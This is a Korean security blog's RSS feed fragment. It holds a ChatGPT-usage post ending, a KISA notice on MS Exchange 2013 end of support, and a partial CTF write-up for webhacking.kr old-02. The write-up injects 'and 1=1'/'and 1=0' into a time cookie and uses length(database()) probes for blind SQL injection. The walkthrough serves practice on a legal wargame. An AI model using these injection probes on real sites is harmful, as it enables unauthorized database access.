data-origin-width=&quot;807&quot; data-origin-height=&quot;715&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;다음은 python으로 간단한 계산기를 만들어 달라고 질의를 하여 답을 얻은 모습 입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;579&quot; data-origin-height=&quot;264&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/rzbTd/btrYQYiGki1/bAjJfri3uZ3Q2LqeXFgky1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/rzbTd/btrYQYiGki1/bAjJfri3uZ3Q2LqeXFgky1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/rzbTd/btrYQYiGki1/bAjJfri3uZ3Q2LqeXFgky1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FrzbTd%2FbtrYQYiGki1%2FbAjJfri3uZ3Q2LqeXFgky1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;600&quot; height=&quot;274&quot; data-origin-width=&quot;579&quot; data-origin-height=&quot;264&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;Chat GPT를 통하여 출력 된 코드를 실행 시켜 보았습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;이처럼 Chat GPT를 통하여 다양하고 편리하게 활용할수도 있지만 한편으로는 Chat GPT를 비합리적으로 사용하거나 공격자 입장에서 챗GPT를 악용해 새로운 사이버 보안 위협에 활용할 수 있다는 생각이 듭니다.&lt;/p&gt;</description>
      <category>Code::Security/ETC</category>
      <category>Ai</category>
      <category>Chat GPT</category>
      <category>Chat GPT 활용법</category>
      <category>인공지능</category>
      <category>챗gpt</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/272</guid>
      <comments>https://securitycode.tistory.com/272#entry272comment</comments>
      <pubDate>Fri, 10 Feb 2023 14:34:48 +0900</pubDate>
    </item>
    <item>
      <title>보안공지 : MS Exchange Server 2013 기술 지원 종료 대비 보안 권고</title>
      <link>https://securitycode.tistory.com/271</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;□&amp;nbsp;개요&lt;/b&gt; &lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;o&amp;nbsp;MS社는&amp;nbsp;2023년&amp;nbsp;4월&amp;nbsp;11일자로&amp;nbsp;MS&amp;nbsp;Exchage&amp;nbsp;Server&amp;nbsp;2013&amp;nbsp;제품의&amp;nbsp;기술&amp;nbsp;지원&amp;nbsp;종료 &lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;o&amp;nbsp;MS&amp;nbsp;Exchage&amp;nbsp;Server&amp;nbsp;2013&amp;nbsp;제품의&amp;nbsp;기술&amp;nbsp;지원이&amp;nbsp;종료되면&amp;nbsp;신규&amp;nbsp;보안&amp;nbsp;취약점&amp;nbsp;및&amp;nbsp;오류에&amp;nbsp;대한&amp;nbsp;보안&amp;nbsp;업데이트를&amp;nbsp;제공하지&amp;nbsp;않으므로&amp;nbsp;Microsoft&amp;nbsp;365&amp;nbsp;등&amp;nbsp;최신&amp;nbsp;서비스로&amp;nbsp;업그레이드&amp;nbsp;및&amp;nbsp;교체를&amp;nbsp;권고 &lt;br /&gt;&lt;br /&gt;&lt;b&gt;□&amp;nbsp;기술&amp;nbsp;지원&amp;nbsp;종료&amp;nbsp;대상&lt;/b&gt; &lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;o&amp;nbsp;MS&amp;nbsp;Exchage&amp;nbsp;Server&amp;nbsp;2013 &lt;br /&gt;&lt;br /&gt;&lt;b&gt;□&amp;nbsp;대응&amp;nbsp;방안&lt;/b&gt; &lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;o&amp;nbsp;기술&amp;nbsp;지원이&amp;nbsp;종료되는&amp;nbsp;제품&amp;nbsp;이용자는&amp;nbsp;보안업데이트가&amp;nbsp;제공되는&amp;nbsp;최신&amp;nbsp;제품으로&amp;nbsp;업그레이드&amp;nbsp;하거나&amp;nbsp;대체&amp;nbsp;MS&amp;nbsp;Exchage&amp;nbsp;Server&amp;nbsp;버전으로&amp;nbsp;교체하는&amp;nbsp;것을&amp;nbsp;권고 &lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-&amp;nbsp;Microsoft&amp;nbsp;365&amp;nbsp;최신&amp;nbsp;제품으로&amp;nbsp;업그레이드&amp;nbsp;권고 &lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;-&amp;nbsp;대체&amp;nbsp;MS&amp;nbsp;Exchage&amp;nbsp;Server*&amp;nbsp;사용&amp;nbsp;희망&amp;nbsp;시&amp;nbsp;참고사이트을&amp;nbsp;통해&amp;nbsp;보안&amp;nbsp;업데이트&amp;nbsp;지원이&amp;nbsp;가능한&amp;nbsp;버전으로&amp;nbsp;교체 &lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;※&amp;nbsp;MS&amp;nbsp;Exchage&amp;nbsp;Server&amp;nbsp;대체&amp;nbsp;시&amp;nbsp;지원종료일&amp;nbsp;참고하여&amp;nbsp;업그레이드&amp;nbsp;진행 &lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;※&amp;nbsp;MS&amp;nbsp;Exchange&amp;nbsp;Server&amp;nbsp;2019의&amp;nbsp;경우&amp;nbsp;일반종료&amp;nbsp;날짜는&amp;nbsp;'24년&amp;nbsp;1월&amp;nbsp;9일이며&amp;nbsp;연장&amp;nbsp;종료&amp;nbsp;날짜는&amp;nbsp;'25년&amp;nbsp;10월&amp;nbsp;14일임[2] &lt;br /&gt;&lt;br /&gt;[참고사이트] &lt;br /&gt;[1] &lt;a href=&quot;https://learn.microsoft.com/en-us/microsoft-365/enterprise/exchange-2013-end-of-support?view=o365-worldwide#how-should-i-migrate-to-microsoft-365&quot;&gt;https://learn.microsoft.com/en-us/microsoft-365/enterprise/exchange-2013-end-of-support?view=o365-worldwide#how-should-i-migrate-to-microsoft-365&lt;/a&gt;&lt;br /&gt;[2]&amp;nbsp;&lt;a href=&quot;https://learn.microsoft.com/ko-kr/lifecycle/products/exchange-server-2019&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://learn.microsoft.com/ko-kr/lifecycle/products/exchange-server-2019&lt;/a&gt; &lt;br /&gt;[3] &lt;a href=&quot;https://krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=67113&quot;&gt;https://krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=67113&lt;/a&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Code::보안공지</category>
      <category>KISA</category>
      <category>MS Exchange Server</category>
      <category>기술지원 종료</category>
      <category>보안공지</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/271</guid>
      <comments>https://securitycode.tistory.com/271#entry271comment</comments>
      <pubDate>Tue, 17 Jan 2023 14:32:53 +0900</pubDate>
    </item>
    <item>
      <title>[Wargame] Webhacking.kr old-02 문제</title>
      <link>https://securitycode.tistory.com/270</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/b&gt; &lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://webhacking.kr/challenge/web-02/&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://webhacking.kr/challenge/web-02/&lt;/a&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;490&quot; data-origin-height=&quot;157&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/0nxUQ/btrVTVvrHD8/4FqHB8IsEC822lxinKkDq0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/0nxUQ/btrVTVvrHD8/4FqHB8IsEC822lxinKkDq0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/0nxUQ/btrVTVvrHD8/4FqHB8IsEC822lxinKkDq0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F0nxUQ%2FbtrVTVvrHD8%2F4FqHB8IsEC822lxinKkDq0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;500&quot; height=&quot;160&quot; data-origin-width=&quot;490&quot; data-origin-height=&quot;157&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;webhacking.kr의 2번 문제를 살펴보면 제한된 영역, IP를 기록하고 있다는 메시지를 확인할 수 있습니다. 해당 문제의 단서를 찾기 위해 한번 살펴보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;574&quot; data-origin-height=&quot;457&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/LWPyF/btrVT7vEeB9/BuYgVhGlkPGZFgWmmK9qdK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/LWPyF/btrVT7vEeB9/BuYgVhGlkPGZFgWmmK9qdK/img.png&quot; data-alt=&quot;개발자 도구를 통한 확인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/LWPyF/btrVT7vEeB9/BuYgVhGlkPGZFgWmmK9qdK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FLWPyF%2FbtrVT7vEeB9%2FBuYgVhGlkPGZFgWmmK9qdK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;570&quot; height=&quot;454&quot; data-origin-width=&quot;574&quot; data-origin-height=&quot;457&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;개발자 도구를 통한 확인&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;첫 번째 단서 - 주석 처리되어 있는 시간값이 현재 시간으로 표시&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;두 번째 단서 - admin.php&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;634&quot; data-origin-height=&quot;551&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dpWABi/btrVOwKJfDx/AX2ItpkNXA523tpnFS4TjK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dpWABi/btrVOwKJfDx/AX2ItpkNXA523tpnFS4TjK/img.png&quot; data-alt=&quot;쿠키값 확인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dpWABi/btrVOwKJfDx/AX2ItpkNXA523tpnFS4TjK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdpWABi%2FbtrVOwKJfDx%2FAX2ItpkNXA523tpnFS4TjK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;570&quot; height=&quot;495&quot; data-origin-width=&quot;634&quot; data-origin-height=&quot;551&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;쿠키값 확인&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;쿠키값 확인 시 PHPSESSID, time 값을 확인할 수 있으며, 여기서 특이한 점은 time 값이 숫자로 표시되어 있다는 점을 알 수 있습니다. (타임스탬프의 유닉스 값으로 표시되고 있음)&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;타임스탬프(timestamp)&amp;nbsp;또는&amp;nbsp;시간&amp;nbsp;표기는&amp;nbsp;특정한&amp;nbsp;시각을&amp;nbsp;나타내거나&amp;nbsp;기록하는&amp;nbsp;문자열입니다. &lt;br /&gt;&lt;br /&gt;타임스탬프의&amp;nbsp;예: &lt;br /&gt;Tue&amp;nbsp;01-01-2009&amp;nbsp;6:00 &lt;br /&gt;2005-10-30&amp;nbsp;T&amp;nbsp;10:45&amp;nbsp;UTC &lt;br /&gt;2007-11-09&amp;nbsp;T&amp;nbsp;11:20&amp;nbsp;UTC &lt;br /&gt;Sat&amp;nbsp;Jul&amp;nbsp;23&amp;nbsp;02:16:57&amp;nbsp;2005 &lt;br /&gt;1256953732&amp;nbsp;(유닉스&amp;nbsp;시간) &lt;br /&gt;(1969-07-21&amp;nbsp;T&amp;nbsp;02:56&amp;nbsp;UTC)&amp;nbsp;&amp;ndash; &lt;br /&gt;07:38,&amp;nbsp;11&amp;nbsp;December&amp;nbsp;2012&amp;nbsp;(UTC)&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;641&quot; data-origin-height=&quot;225&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/30ax8/btrVOTFIbqs/Jr1wEdEYxxkB49JutIL7n0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/30ax8/btrVOTFIbqs/Jr1wEdEYxxkB49JutIL7n0/img.png&quot; data-alt=&quot;https://www.epochconverter.com/&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/30ax8/btrVOTFIbqs/Jr1wEdEYxxkB49JutIL7n0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F30ax8%2FbtrVOTFIbqs%2FJr1wEdEYxxkB49JutIL7n0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;640&quot; height=&quot;225&quot; data-origin-width=&quot;641&quot; data-origin-height=&quot;225&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;https://www.epochconverter.com/&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;타임스탬프 변환사이트를 통해 확인해 보면 주석처리되어 있던 시간 부분과 일치 하는것을 알 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;첫 번째 단서는 유닉스에서 사용되는 타임스탬프 값인 것을 확인하였습니다. 그럼 두 번째 단서인 admin.php를 확인해 보겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;578&quot; data-origin-height=&quot;439&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bFkPLu/btrVPGy8MXC/JD5utqDOG0yOeyRLIFpPgk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bFkPLu/btrVPGy8MXC/JD5utqDOG0yOeyRLIFpPgk/img.png&quot; data-alt=&quot;admin.php&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bFkPLu/btrVPGy8MXC/JD5utqDOG0yOeyRLIFpPgk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbFkPLu%2FbtrVPGy8MXC%2FJD5utqDOG0yOeyRLIFpPgk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;570&quot; height=&quot;433&quot; data-origin-width=&quot;578&quot; data-origin-height=&quot;439&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;admin.php&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;admin.php 페이지를 확인해 보면 패스워드를 입력하라는 메시지와 제출 버튼이 보입니다. 여기서 SQL Injection 공격을 시도해 보았지만 패스워드를 잘못 입력하였다는 알림 창을 확인할 수 있었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;LOS 문제에서 보았던 소스코드중 해당 부분을 통하여 패스워드를 검증하고 있는 것 같습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #007700;&quot;&gt;if((&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$result&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;'pw'&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;])&amp;nbsp;&amp;amp;&amp;amp;&amp;nbsp;(&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$result&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;'pw'&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;]&amp;nbsp;==&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$_GET&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;'pw'&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;]))&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;그럼 이제 우리는 패스워드를 찾아야 하기 때문에 첫 번째 단서인 쿠키값을 확인해 보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;974&quot; data-origin-height=&quot;484&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/boAT5v/btrVQNY8zOA/FbltLvtV1bLnc1uCEme13k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/boAT5v/btrVQNY8zOA/FbltLvtV1bLnc1uCEme13k/img.png&quot; data-alt=&quot;and 1=1&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/boAT5v/btrVQNY8zOA/FbltLvtV1bLnc1uCEme13k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FboAT5v%2FbtrVQNY8zOA%2FFbltLvtV1bLnc1uCEme13k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;398&quot; data-origin-width=&quot;974&quot; data-origin-height=&quot;484&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;and 1=1&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;time 쿠키값 뒤에 and 1=1를 입력하였더니 시간 값이 바뀐 것을 확인할 수 있었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;974&quot; data-origin-height=&quot;484&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/SeiHl/btrVUzSMSfl/GpuKtYoki1l2KYWqAij2b0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/SeiHl/btrVUzSMSfl/GpuKtYoki1l2KYWqAij2b0/img.png&quot; data-alt=&quot;and 1=0&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/SeiHl/btrVUzSMSfl/GpuKtYoki1l2KYWqAij2b0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FSeiHl%2FbtrVUzSMSfl%2FGpuKtYoki1l2KYWqAij2b0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;398&quot; data-origin-width=&quot;974&quot; data-origin-height=&quot;484&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;and 1=0&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;time 쿠키값 뒤에 and 1=0를 입력하였더니 시간 값이 바뀐것을 확인할 수 있었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;참 : 2070-01-01 09:00:01&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;거짓 : 2070-01-01 09:00:00&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;여기서 참인 값과 거짓값을 입력하였을때 반환되는 값이 다르므로 해당 값을 통하여 blind sql injection이 가능할 수도 있다고 추측할 수 있습니다. 그럼 blind sql injection 공격을 시도해 보겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;revenue_unit_wrap&quot;&gt;
  &lt;div class=&quot;revenue_unit_item adsense responsive&quot;&gt;
    &lt;div class=&quot;revenue_unit_info&quot;&gt;반응형&lt;/div&gt;
    &lt;script src=&quot;//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js&quot; async=&quot;async&quot;&gt;&lt;/script&gt;
    &lt;ins class=&quot;adsbygoogle&quot; style=&quot;display: block;&quot; data-ad-host=&quot;ca-host-pub-9691043933427338&quot; data-ad-client=&quot;ca-pub-1078460042237685&quot; data-ad-format=&quot;auto&quot;&gt;&lt;/ins&gt;
    &lt;script&gt;(adsbygoogle = window.adsbygoogle || []).push({});&lt;/script&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;첫 번째로 DB의 길이를 알아내야 합니다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;302&quot; data-origin-height=&quot;378&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bCUn5e/btrVTUKfGPa/ZZraccffRFFIIQmfQzzMgK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bCUn5e/btrVTUKfGPa/ZZraccffRFFIIQmfQzzMgK/img.png&quot; data-alt=&quot;bWAPP DB 예시&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bCUn5e/btrVTUKfGPa/ZZraccffRFFIIQmfQzzMgK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbCUn5e%2FbtrVTUKfGPa%2FZZraccffRFFIIQmfQzzMgK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;300&quot; height=&quot;375&quot; data-origin-width=&quot;302&quot; data-origin-height=&quot;378&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB 예시&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP DB를 통해 먼저 예시로 들어 보면 bWAPP의 DB 이름은 bwapp인 것을 확인하였고, length(database())=1; 쿼리를 통하여 DB의 길이가 1인지 쿼리를 하면 0 (거짓) 반환되고, length(database())=5; 쿼리를 통하여 DB의 길이가 5인지 쿼리 하였을 때는 1(참)을 반환하는 것을 확인할 수 있습니다.&amp;nbsp; &amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;여기서는 DB의 이름을 알아내야 하기 때문에, 데이터베이스의 길이가 몇글자인지 먼저 확인을 먼저 해보도록 하겠습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;906&quot; data-origin-height=&quot;485&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bgTqYo/btrVOzURCQL/v3I4VaBjXaoKfwv3f1a1Lk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bgTqYo/btrVOzURCQL/v3I4VaBjXaoKfwv3f1a1Lk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bgTqYo/btrVOzURCQL/v3I4VaBjXaoKfwv3f1a1Lk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbgTqYo%2FbtrVOzURCQL%2Fv3I4VaBjXaoKfwv3f1a1Lk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;428&quot; data-origin-width=&quot;906&quot; data-origin-height=&quot;485&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
